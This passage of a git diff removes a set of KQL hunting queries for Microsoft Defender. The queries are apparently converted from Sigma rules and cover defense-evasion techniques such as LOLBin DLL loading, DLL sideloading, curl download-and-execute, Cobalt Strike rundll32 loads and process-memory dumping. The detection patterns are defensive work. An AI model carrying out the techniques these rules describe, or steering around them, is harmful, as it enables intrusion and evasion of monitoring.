/dev/null @@ -1,9 +0,0 @@ -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/07 -// Level: medium -// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. -This utility can be abused in order to run custom COM object created in the registry. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}") and (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe")) or ((ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}") and (not((FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql b/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql deleted file mode 100644 index 8a079db6..00000000 --- a/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: medium -// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql b/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql deleted file mode 100644 index ba7ae505..00000000 --- a/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/07/17 -// Level: high -// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem. -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService")) \ No newline at end of file diff --git a/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql b/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql deleted file mode 100644 index 948e8aaf..00000000 --- a/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/09/17 -// Level: high -// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel. -// Tags: attack.defense_evasion, attack.t1562.002 -DeviceRegistryEvents -| where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Change_the_Fax_Dll.kql b/Defense Evasion/Change_the_Fax_Dll.kql deleted file mode 100644 index f42ea9fd..00000000 --- a/Defense Evasion/Change_the_Fax_Dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/07/17 -// Level: high -// Description: Detect possible persistence using Fax DLL load when service restart -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "\\Software\\Microsoft\\Fax\\Device Providers" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll")) \ No newline at end of file diff --git a/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql b/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql deleted file mode 100644 index 37d93606..00000000 --- a/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/12 -// Level: medium -// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "Enabled" and RegistryKey contains "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites") \ No newline at end of file diff --git a/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql b/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql deleted file mode 100644 index fe5a03e5..00000000 --- a/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Wojciech Lesicki -// Date: 2021/06/01 -// Level: high -// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 ")) \ No newline at end of file diff --git a/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql b/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql deleted file mode 100644 index fe701214..00000000 --- a/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024/01/17 -// Level: medium -// Description: Detects a CodePage modification using the "mode.com" utility to Russian language. -This behavior has been used by threat actors behind Dharma ransomware. - -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM") \ No newline at end of file diff --git a/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql b/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql deleted file mode 100644 index c597db84..00000000 --- a/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Julia Fomina, oscd.community -// Date: 2020/10/05 -// Level: medium -// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Control_Panel_Items.kql b/Defense Evasion/Control_Panel_Items.kql deleted file mode 100644 index de98b896..00000000 --- a/Defense Evasion/Control_Panel_Items.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_) -// Date: 2020/06/22 -// Level: high -// Description: Detects the malicious use of a control panel item -// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546 -DeviceProcessEvents -| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|"))))) \ No newline at end of file diff --git a/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql b/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql deleted file mode 100644 index 1f4c9f72..00000000 --- a/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020/10/11 -// Level: medium -// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Defense Evasion/CreateDump_Process_Dump.kql b/Defense Evasion/CreateDump_Process_Dump.kql deleted file mode 100644 index d2af686e..00000000 --- a/Defense Evasion/CreateDump_Process_Dump.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/04 -// Level: high -// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory -// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") \ No newline at end of file diff --git a/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql b/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql deleted file mode 100644 index ef6299fb..00000000 --- a/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim -// Date: 2022/04/28 -// Level: medium -// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync) -// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") \ No newline at end of file diff --git a/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql b/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql deleted file mode 100644 index 973ed62c..00000000 --- a/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), fornotes -// Date: 2022/12/01 -// Level: medium -// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). -Usually this technique is used to achieve DLL hijacking. - -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceFileEvents -| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll" \ No newline at end of file diff --git a/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql b/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql deleted file mode 100644 index f9303a14..00000000 --- a/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/05/09 -// Level: high -// Description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking -// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001 -DeviceFileEvents -| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysWOW64\\" or FolderPath contains "\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql b/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql deleted file mode 100644 index 544ae6eb..00000000 --- a/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2019/02/11 -// Level: high -// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. -// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense_evasion, attack.t1218.005, attack.t1027.004 -DeviceProcessEvents -| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection"))) \ No newline at end of file diff --git a/Defense Evasion/Curl_Download_And_Execute_Combination.kql b/Defense Evasion/Curl_Download_And_Execute_Combination.kql deleted file mode 100644 index a0dd325c..00000000 --- a/Defense Evasion/Curl_Download_And_Execute_Combination.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/01/13 -// Level: high -// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. -// Tags: attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105 -DeviceProcessEvents -| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") \ No newline at end of file diff --git a/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql b/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql deleted file mode 100644 index 40bbb2ff..00000000 --- a/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: CD_R0M_ -// Date: 2022/06/11 -// Level: high -// Description: Detects the abuse of custom file open handler, executing powershell -// Tags: attack.defense_evasion, attack.t1202 -DeviceRegistryEvents -| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey contains "shell\\open\\command" \ No newline at end of file diff --git a/Defense Evasion/DHCP_Callout_DLL_Installation.kql b/Defense Evasion/DHCP_Callout_DLL_Installation.kql deleted file mode 100644 index 67ddb9cc..00000000 --- a/Defense Evasion/DHCP_Callout_DLL_Installation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Dimitrios Slamaris -// Date: 2017/05/15 -// Level: high -// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) -// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112 -DeviceRegistryEvents -| where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled" \ No newline at end of file diff --git a/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql b/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql deleted file mode 100644 index 580b5c06..00000000 --- a/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ivan Dyachkov, Yulia Fomina, oscd.community -// Date: 2020/10/07 -// Level: medium -// Description: Detects using register-cimprovider.exe to execute arbitrary dll file. -// Tags: attack.defense_evasion, attack.t1574 -DeviceProcessEvents -| where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe" \ No newline at end of file diff --git a/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql b/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql deleted file mode 100644 index 2ffe336e..00000000 --- a/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Julia Fomina, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe") \ No newline at end of file diff --git a/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql b/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql deleted file mode 100644 index d3c89b0f..00000000 --- a/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/17 -// Level: medium -// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" -// Tags: attack.defense_evasion, attack.t1070 -DeviceImageLoadEvents -| where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\" \ No newline at end of file diff --git a/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql b/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql deleted file mode 100644 index 021c10fe..00000000 --- a/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/30 -// Level: high -// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations -// Tags: attack.defense_evasion, attack.t1218.003 -DeviceImageLoadEvents -| where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql b/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql deleted file mode 100644 index 7e67003a..00000000 --- a/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer @austinsonger -// Date: 2021/10/23 -// Level: medium -// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") \ No newline at end of file diff --git a/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql deleted file mode 100644 index 056a9e92..00000000 --- a/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/07/30 -// Level: high -// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) -but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002 -DeviceFileEvents -| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\") \ No newline at end of file diff --git a/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql deleted file mode 100644 index 29170ff9..00000000 --- a/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/01 -// Level: high -// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. -Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter - -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ShellChromeAPI.dll" \ No newline at end of file diff --git a/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql b/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql deleted file mode 100644 index 3e19a55a..00000000 --- a/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/02 -// Level: high -// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceProcessEvents -| where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\")) \ No newline at end of file diff --git a/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql b/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql deleted file mode 100644 index 35b252a0..00000000 --- a/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Austin Songer -// Date: 2021/07/22 -// Level: medium -// Description: Detects when a user enables DNS-over-HTTPS. -This can be used to hide internet activity or be used to hide the process of exfiltrating data. -With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. - -// Tags: attack.defense_evasion, attack.t1140, attack.t1112 -DeviceRegistryEvents -| where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled") \ No newline at end of file diff --git a/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql b/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql deleted file mode 100644 index 08a09450..00000000 --- a/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Janantha Marasinghe -// Date: 2020/09/26 -// Level: low -// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. -// Tags: attack.defense_evasion, attack.t1564.006, attack.t1564 -DeviceProcessEvents -| where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm") \ No newline at end of file diff --git a/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql b/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql deleted file mode 100644 index 42c5fde8..00000000 --- a/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Agro (@agro_sev) oscd.community -// Date: 2020/10/10 -// Level: medium -// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. -Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. - -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe"))) \ No newline at end of file diff --git a/Defense Evasion/DeviceCredentialDeployment_Execution.kql b/Defense Evasion/DeviceCredentialDeployment_Execution.kql deleted file mode 100644 index 9562d08b..00000000 --- a/Defense Evasion/DeviceCredentialDeployment_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where FolderPath endswith "\\DeviceCredentialDeployment.exe" \ No newline at end of file diff --git a/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql b/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql deleted file mode 100644 index 00125077..00000000 --- a/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community (rule), @_felamos (idea) -// Date: 2019/10/12 -// Level: high -// Description: The Devtoolslauncher.exe executes other binary -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe" \ No newline at end of file diff --git a/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql b/Defense 